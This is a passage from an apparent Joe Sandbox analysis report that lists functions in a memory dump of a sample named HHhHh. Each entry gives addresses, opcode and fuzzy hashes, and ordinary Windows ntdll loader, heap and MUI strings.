                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: 63edc2f5ea1cefe76134c40bbcfaf42742d34ec8e10e73e354afb9e1b2ed5cb4
                                            • Instruction ID: 2a5e694b76f260efc6ffd1c111c44de3ce0bb1bdc4c72f0a9370a226540fd339
                                            • Opcode Fuzzy Hash: 63edc2f5ea1cefe76134c40bbcfaf42742d34ec8e10e73e354afb9e1b2ed5cb4
                                            • Instruction Fuzzy Hash: 7141F1B1564301ABC725EB68D845B6F7BECEF94B54F00492EFA48E7290E770D814CB92
                                            Function 0134C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            • PreferredUILanguages, xrefs: 0134C212
                                            • @, xrefs: 0134C1F1
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0134C1C5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: 18177a097ee9a2e1cab5116a41f55bb47a9746f4c3c8eeb68487dfcec3061857
                                            • Instruction ID: 1302d775cc981265c6490a03ed68571263cd5482cdc9dddcae58950e14a4137f
                                            • Opcode Fuzzy Hash: 18177a097ee9a2e1cab5116a41f55bb47a9746f4c3c8eeb68487dfcec3061857
                                            • Instruction Fuzzy Hash: D3416371E1121EEBDF11DED9C881FEEBBF8AB14704F14406AE605B7280E7B4AA448B50
                                            Function 01324144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: 8353504e7438a8f2effb36a5ef094dba3230ab4260787d970c4677ac6a154f59
                                            • Instruction ID: 7fa9d61c2cbc70b3e5b0ca1ead37e97a2c7aa6437b690c1b806b4a5ae6fb944c
                                            • Opcode Fuzzy Hash: 8353504e7438a8f2effb36a5ef094dba3230ab4260787d970c4677ac6a154f59
                                            • Instruction Fuzzy Hash: 66412631A10768CBEB26EBE9C844BADBBB8FF56348F24045AD901EB781D7749901CB51
                                            Function 01314755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01314899
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01314888
                                            • LdrpCheckRedirection, xrefs: 0131488F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: 8fdbba22e565bc45aee3b7ccaf8059f878097d30d01ca8f7f058f1ecb99b8c95
                                            • Instruction ID: 3b9e1e647dd5c5aca860267a30b6b7c5117a7ec82b5e83f812cc13643d0320a4
                                            • Opcode Fuzzy Hash: 8fdbba22e565bc45aee3b7ccaf8059f878097d30d01ca8f7f058f1ecb99b8c95
                                            • Instruction Fuzzy Hash: 8141E272A143518FCB2ACF2CD840A267FE8AF49B58F09056DED59D7359D331D800CB91
                                            Function 012A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: 2445d7558fb2f03dd4209efa60ebc8c8536c100e634ea6e62c333a9955a832fd
                                            • Instruction ID: b6b0b4d282cfb5b607d580087caabd5fb036048694d70abb3360628b43b0f47a
                                            • Opcode Fuzzy Hash: 2445d7558fb2f03dd4209efa60ebc8c8536c100e634ea6e62c333a9955a832fd
                                            • Instruction Fuzzy Hash: F811CD313352429FDB29DE18D442B7AF3A8EF40B16F58856EF6068B291EB34D840CB58
                                            Function 013120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                            Download Yara Rule
                                            Strings
                                            • Process initialization failed with status 0x%08lx, xrefs: 013120F3
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01312104
                                            • LdrpInitializationFailure, xrefs: 013120FA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: cd34d9c46e88f18d7755944e865e9979f0dc894facae3f7dfe7a5fee7a14cb9c
                                            • Instruction ID: 2ad321391d4f70b9ce103be6614e4f22a1c05b97f9641d3f1053435268737e4a
                                            • Opcode Fuzzy Hash: cd34d9c46e88f18d7755944e865e9979f0dc894facae3f7dfe7a5fee7a14cb9c
                                            • Instruction Fuzzy Hash: DFF0C275650308AFE728E75DDC53F9A7B6CFB41B58F200469FA0077689D2B0E941C691
                                            Function 012A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: 60f49633e295a8b356fcd541a6b1aed596cdbaded1d3d41cc2fb0dda10d3317b
                                            • Instruction ID: 680297d4376bdc6f9ad1cb02375f8f25603f0651a136afb1a9fb9ff5c9e74fc1
                                            • Opcode Fuzzy Hash: 60f49633e295a8b356fcd541a6b1aed596cdbaded1d3d41cc2fb0dda10d3317b
                                            • Instruction Fuzzy Hash: 71714A71A1014ADFDB05DFA8C991BAEB7F8FF08704F144069EA05E7251EA74ED41CBA4
                                            Function 0129A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrResSearchResource Enter, xrefs: 0129AA13
                                            • LdrResSearchResource Exit, xrefs: 0129AA25
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            • Opcode ID: 8f539ce366b83f3f69d652714e54af4c58b9b1a94b0e236969c9608340f503f3
                                            • Instruction ID: 0155cb963883ba40d99b152d2531f57a898605d9e4a45e305bcfee8f67f31acb
                                            • Opcode Fuzzy Hash: 8f539ce366b83f3f69d652714e54af4c58b9b1a94b0e236969c9608340f503f3
                                            • Instruction Fuzzy Hash: 7AE18071A3031ADBEF22CE9DC990BAEBBB9BF15314F10452AEA01E7241E774D940CB50
                                            Function 0135A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: 88c9487a9d99d570f5649cfe7562193699346e4b760246e0a0e46a19757907e4
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: 2AC1DD312043469BEB64CF28C840F2BBBE5AFC4B1CF084A2DFA968B290D774D505DB91
                                            Function 0130E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 79683cdaad485cf29366742a2ca8f364e0ee2d3f0f7a9d52bc50a36e7f794f77
                                            • Instruction ID: 6ff62f04bc86423a45d387963bd95c6dfd3c95620a5c2b6ececdd3f62f596297
                                            • Opcode Fuzzy Hash: 79683cdaad485cf29366742a2ca8f364e0ee2d3f0f7a9d52bc50a36e7f794f77
                                            • Instruction Fuzzy Hash: AA615D72E142199FDB15DFA8C850BAEBBF9FB44B04F14487DE649EB291D731AA00CB50
                                            Function 013343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$MUI
                                            • API String ID: 0-17815947
                                            • Opcode ID: 7213945be28082585cdb81aa5cb3133f06e6c423d73c004d4dc8ca541aa7db42
                                            • Instruction ID: 51724cccea348861fe307eaf50353edca2f44750ae9260555b89fbac1555b773
                                            • Opcode Fuzzy Hash: 7213945be28082585cdb81aa5cb3133f06e6c423d73c004d4dc8ca541aa7db42
                                            • Instruction Fuzzy Hash: 15510871E1021DAFEF11DFA9CC90AEEBBBDEB48758F100529E611B7290D6349905CB64
                                            Function 012904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            • kLsE, xrefs: 01290540
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0129063D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: 518d4573d8ea1500c2f6b4f2b26b65edfe5a063006eba005db15f8521a92d1d8
                                            • Instruction ID: 8b0ff0094b6bc8cf7c0124c5413272e0b6acdbdaa766461c5540aaba4a0efd13
                                            • Opcode Fuzzy Hash: 518d4573d8ea1500c2f6b4f2b26b65edfe5a063006eba005db15f8521a92d1d8
                                            • Instruction Fuzzy Hash: 5751CF7152474B8FDB24DF6CC5406A7BBE9AF84304F10483EFAAA87241E770E545CB9A
                                            Function 0129A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0129A2FB
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0129A309
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 7da4561a4d9c992812ea9dbcea593be5be0a3a67c62f3e2a0fa97e00b8956d2c
                                            • Instruction ID: 2e46184a68d5969ca60a3ba5d31b4fb43fdf66a118b74a6e7a8db7660977737e
                                            • Opcode Fuzzy Hash: 7da4561a4d9c992812ea9dbcea593be5be0a3a67c62f3e2a0fa97e00b8956d2c
                                            • Instruction Fuzzy Hash: 3B419D31A2474ADBDB15CF5DC841B6ABBB4FF85704F1440A9EE01DB291E2B5D940CB54
                                            Function 012CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: 7d9b3e324eec1c1e336449f8774f71efae1f36bc8b25b721f2ce0e75bdba3888
                                            • Instruction ID: ee4da68a108051c9f05bda5421e945f64d2f547ab18aa2774eb387e69af528b8
                                            • Opcode Fuzzy Hash: 7d9b3e324eec1c1e336449f8774f71efae1f36bc8b25b721f2ce0e75bdba3888
                                            • Instruction Fuzzy Hash: 9D01F4B2260748AFD311DF14CD46F2677E8EB94B29F008A3DA648C7190E374D904CB46
                                            Function 0129C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 066d4d61ef44fd1eeea29dbd90263731fd40e5e888fe01857594bd8c29b801d6
                                            • Instruction ID: 7afbc6a75e6d2f664166bce2a51507f807287413cdf5ce7b750081f58ddec420
                                            • Opcode Fuzzy Hash: 066d4d61ef44fd1eeea29dbd90263731fd40e5e888fe01857594bd8c29b801d6
                                            • Instruction Fuzzy Hash: 8B826A75E202198BEF25CFADC880BEDBBB5FF48310F14816ADA19AB251D7709981DF50
                                            Function 01316420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 7ac50525cf061811dc819a8ecab6e60ba63ec0ef13cf4008f77d4d2fc18118cf
                                            • Instruction ID: 06262f7210a09b5d64b8a09d8e38adf70ae3e744cb91816d78edb7762ea36edc
                                            • Opcode Fuzzy Hash: 7ac50525cf061811dc819a8ecab6e60ba63ec0ef13cf4008f77d4d2fc18118cf
                                            • Instruction Fuzzy Hash: 809183B1A11219AFEB25DF99CD85FEEBBB9EF14754F140025F600AB194D774AD00CBA0
                                            Function 012CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            • Opcode ID: baf3845484f6682af7dde10180513aaf6e9936d81cf0db482e06d6b8488ac4cc
                                            • Instruction ID: 0aab735d3592e82c6c7a6870d5afd47aa8b08fa2b33ce3a472c42356eed63e19
                                            • Opcode Fuzzy Hash: baf3845484f6682af7dde10180513aaf6e9936d81cf0db482e06d6b8488ac4cc
                                            • Instruction Fuzzy Hash: 497180B5E0021ACFDF29CF9CC5A16ADBBF1BF88714F14812EE505A7285E7318951CB64
                                            Function 01334978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .mui
                                            • API String ID: 0-1199573805
                                            • Opcode ID: c81f999737f3cb95722a8798f336e88fb7f44518ba29bf5804eb026af6881d15
                                            • Instruction ID: d168e9dfbccc8e50ef6943f328e3de2076931b22829bbd4bab762c6064c20a36
                                            • Opcode Fuzzy Hash: c81f999737f3cb95722a8798f336e88fb7f44518ba29bf5804eb026af6881d15
                                            • Instruction Fuzzy Hash: AB51C672D1022A9BDF14DF99D940AFEBBB8BF44658F054129EA51BB350D3349C01CBE8
                                            Function 012AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: bce2454bce40c18da951b85970901fbc81a218df9a756c38de0476cc067249c3
                                            • Instruction ID: b1fb07a18108b218bdfb2831f8f40ed4f20499520e1cee897c9f8fe82e00e90d
                                            • Opcode Fuzzy Hash: bce2454bce40c18da951b85970901fbc81a218df9a756c38de0476cc067249c3
                                            • Instruction Fuzzy Hash: FD41B3725283029BD714DA75CD41B6BBBE8AF88704F85092DF684D7180E774D949C793
                                            Function 0128CDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AlternateCodePage
                                            • API String ID: 0-3889302423
                                            • Opcode ID: da49452834be38e66b0ed123702c1b79ef37e8a4207b1aab2441e8d412866e51
                                            • Instruction ID: 426ebb32745712d8bfaad47a9cda05dd7d7cae9dcf3e618ff8204fd26d4b3f50
                                            • Opcode Fuzzy Hash: da49452834be38e66b0ed123702c1b79ef37e8a4207b1aab2441e8d412866e51
                                            • Instruction Fuzzy Hash: C841E176D2120AABDF25EB99DC84AFEBBF8FF44310F54415AE611E3280D7709A41CB50
                                            Function 0130C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 4b1f736a5026fc1b411c14505a2ff7c69b2a3d65952bba316f5e58ea6ff46ebc
                                            • Instruction ID: 58cd6c6f8d81047cd2561cb6a77a29d6779d7b13883788d16bfbcc60b9bb7104
                                            • Opcode Fuzzy Hash: 4b1f736a5026fc1b411c14505a2ff7c69b2a3d65952bba316f5e58ea6ff46ebc
                                            • Instruction Fuzzy Hash: 324147B1D1052DABDB21DA54CC94FEEB7BCAB45718F0046E5E708A7180DB709E89CF98
                                            Function 01326B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: a440a2c43943c1a528c7ec1b982c12984e6bcab02ab819868023e9338ca35124
                                            • Instruction ID: d7c1bb74b9f6c2917809c113accdf0ccc6fd014f53d5323a00059e931c467426
                                            • Opcode Fuzzy Hash: a440a2c43943c1a528c7ec1b982c12984e6bcab02ab819868023e9338ca35124
                                            • Instruction Fuzzy Hash: 9F310671A007799BEF22FF69C851BEEBBA8DF44708F544028ED45AB282D775D805CB50
                                            Function 0130CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryName
                                            • API String ID: 0-215506332
                                            • Opcode ID: aed043aeddf4f8bf5b32ee1ed09dbcd9c8d08f92fceffda8e50c53faef43857c
                                            • Instruction ID: b3ce5fc6ba4d67eaf27949e4d857815ae29639d1bb28a87736fde6c4515a60f2
                                            • Opcode Fuzzy Hash: aed043aeddf4f8bf5b32ee1ed09dbcd9c8d08f92fceffda8e50c53faef43857c
                                            • Instruction Fuzzy Hash: 2F312736900919EFEB16DB58C861E7FBBB4EF80714F0142A9E901A7291D730DE00DBE0
                                            Function 0131892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            Strings
                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0131895E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                            • API String ID: 0-702105204
                                            • Opcode ID: 0b7b3e455473d7836c8424b9a5c50ee95479327873c99d22812bff4864f6850e
                                            • Instruction ID: cc66eca3d1422209d30699d7b7aa1e1e119d496c4afab2fa5548845a881a34a7
                                            • Opcode Fuzzy Hash: 0b7b3e455473d7836c8424b9a5c50ee95479327873c99d22812bff4864f6850e
                                            • Instruction Fuzzy Hash: A701DB323103059FE729AF59DC84B6A7F6AEFC566CF04146CF64116559CF206C81C79A
                                            Function 01332000 Relevance: .8, Instructions: 757COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0dde42c48f43bd1f3cce445f5b479070f408d448d9ca0b445ae5911eab7197e4
                                            • Instruction ID: 40d78e95bd8612b97dabc5af7b76143f063d27bfc86a1b148672bfb718d67d66
                                            • Opcode Fuzzy Hash: 0dde42c48f43bd1f3cce445f5b479070f408d448d9ca0b445ae5911eab7197e4
                                            • Instruction Fuzzy Hash: C942D1326083419FE725CF68C890A7BBBE5BFC8708F48492DFA829B250D771D945CB56
                                            Function 01328158 Relevance: .6, Instructions: 617COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 868a9ae046ce0d8ad6d5bee8a50a3f4a095f21c907f99911b74719c5842a28b8
                                            • Instruction ID: a99cae3c8e8aa025aca33dbd1d1bfd0bb56e3058a88e95627176d267af984044
                                            • Opcode Fuzzy Hash: 868a9ae046ce0d8ad6d5bee8a50a3f4a095f21c907f99911b74719c5842a28b8
                                            • Instruction Fuzzy Hash: 6C425D75E102298FEB24DF69C881BADBBF5BF48314F1480D9E949EB242D734A985CF50
                                            Function 012A2840 Relevance: .6, Instructions: 605COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84bfc443c812c038fe2a09f682f260136d48db33329bf990f98f0db791b0827f
                                            • Instruction ID: bc4cef2af6214488a93ba18214d2439d83daab73c8085051b96c070dcc391bc6
                                            • Opcode Fuzzy Hash: 84bfc443c812c038fe2a09f682f260136d48db33329bf990f98f0db791b0827f
                                            • Instruction Fuzzy Hash: 7532C970A207568FEB24CF69C845BBEFBF2EF84704F24412DD6869B285D775A806CB50
                                            Function 0133A118 Relevance: .6, Instructions: 591COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 202b68c5c6bd07fc13cb86d10fee07af18c0c8573f3d7ccfefd07094c9120229
                                            • Instruction ID: d967eab33b5655b1edbaaaa060c4ddaa6b3e6c6a5b867b425afd3522b90580fe
                                            • Opcode Fuzzy Hash: 202b68c5c6bd07fc13cb86d10fee07af18c0c8573f3d7ccfefd07094c9120229
                                            • Instruction Fuzzy Hash: C822E0702046658BEB25CF2DC094772BBF1AFC5318F08845AE9C6CF686D335E492DB68
                                            Function 012B8DBF Relevance: .6, Instructions: 554COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c3e03f9aaa0564d90bd5055e0b27ab962e7e8e95f18c579024d080f342accdb4
                                            • Instruction ID: 8614ea58d3bedeead8c5fbbe1802ddcfb962d4e31951a14d6c21b1f3e4763e4d
                                            • Opcode Fuzzy Hash: c3e03f9aaa0564d90bd5055e0b27ab962e7e8e95f18c579024d080f342accdb4
                                            • Instruction Fuzzy Hash: 6A224D70E2011A9BCB15CF99C4819FEFBF6FF44354F54806AEA499B241E774E981CBA0
                                            Function 01296A50 Relevance: .5, Instructions: 548COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23d7a7bdcac6d3984adf396c96cfacedd57b2d5d9460d049ca5de0bef8d2f2a6
                                            • Instruction ID: 071c94dce6f2871563a64f1346e9cf3eb274bd054f5a04e069bcb27015535858
                                            • Opcode Fuzzy Hash: 23d7a7bdcac6d3984adf396c96cfacedd57b2d5d9460d049ca5de0bef8d2f2a6
                                            • Instruction Fuzzy Hash: 44328B71A20216CFDB25CFACC490BAABBF1FF48310F148569EA56AB391D774A851CB50
                                            Function 012B4A35 Relevance: .4, Instructions: 423COMMON
                                            Download Yara Rule
                                            Memory Dump Source
